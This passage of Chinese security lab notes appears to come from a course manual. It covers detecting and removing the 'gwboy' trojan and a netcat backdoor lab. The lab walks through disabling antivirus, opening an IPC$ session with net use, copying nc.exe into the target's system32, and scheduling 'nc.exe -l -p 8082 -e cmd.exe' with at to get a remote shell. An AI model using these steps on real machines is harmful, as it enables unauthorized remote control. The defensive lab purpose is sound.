55、进行嗅探，看是否还能接收到信息，如果不能，分析其原因并详细写出来。 （九） 木马病毒的查杀（广外男生病毒）操作步骤：服务器端程序的制作； 客户端程序的制作； 将服务器端程序植入要攻击的主机,并使它运行服务器端程序； 客户端可以查看一下：cmd-netstat -an 查看网络端口占用状态,是否有客户端ip地址与本地主机建立了连接,记住连接的端口号查看木马插入的进程：cmd-fport 找到木马插入的PID(进程号)由上一步得到的PID(进程号),查看此进程运行的动态连接库：cmd-tlist PID由上一步得到的动态连接库 查看木马是否还插入其它的进程：cmd-tlist -m gwboydl

56、l.dll(动态连接库)查看是否被gwboy控制：第一步：netstat -an，看是否有人启动自己的90端口，并处于通信状态；第二步：用fport 端口号来查看是那些进程； 用tlist 进程号来查看进程是否为合法进程； 用tlist -m 动态连接库来查看该动态连接库都在哪些进程中 删除：第一步： cwinntsystem32gwboy.exe 第二步：注册表machinesoftwaremicrosoftwindowscurrentversionrun 第三步：在带命令行的安全模式下，用del gwboydll.dll删除）（十） NC实验用到的工具可以是：nc（打开后门程序），前提关闭

57、杀毒软件（1）建立空连接net use对方ipipc$“口令”/user:“用户名” 例如net use 192.168.0.206ipc$ 123 /user:administrator（2）将后门程序(nc)拷贝到对方计算copy nc.exe对方ipadmin$system32(拷贝到system32的原因：是环境变量path=c:winntsystem32;查看环境变量：我的电脑-属性-高级-环境变量-系统环境变量-系统缺省下的路径%SystemRoot%system32;%SystemRoot%;例如copy c:nc.exe 192.168.0.206admin$system32（

58、3）查看对方系统当前时间net time对方ip例如net time192.168.0.208（4）根据第三步时间之后2，3分钟之后定时 at对方IP 10：00 nc.exe -d -l -p 8082 -e cmd.exe:定时在对方机子上启动nc程序 (-d：-l：-p：在8082端口上等待的连接；-e cmd.exe：以命令行方式运行) at对方IP：在自己机子上查看是否执行 at：在对方机子上查看是否执行备注：定时启动命令的机制：开始-程序-管理工具-服务-task schedule（at即调用了此服务）（5）连接对方的8082端口 nc对方IP 8082 （检查是否连接对方：ipconfig看本地连接是否为对方IP；添加用户和组等） 辅助查看是否连接的工具（net use：查看连接计算机、netstat -an：查看是否连接、tlist：查看进程号、fport：查看端口号、net session:在对方机 器上查看有谁运行nc、at：查看是否有nc执行、netwatch可以查看连接自己的机器）（6）shutdown对方IP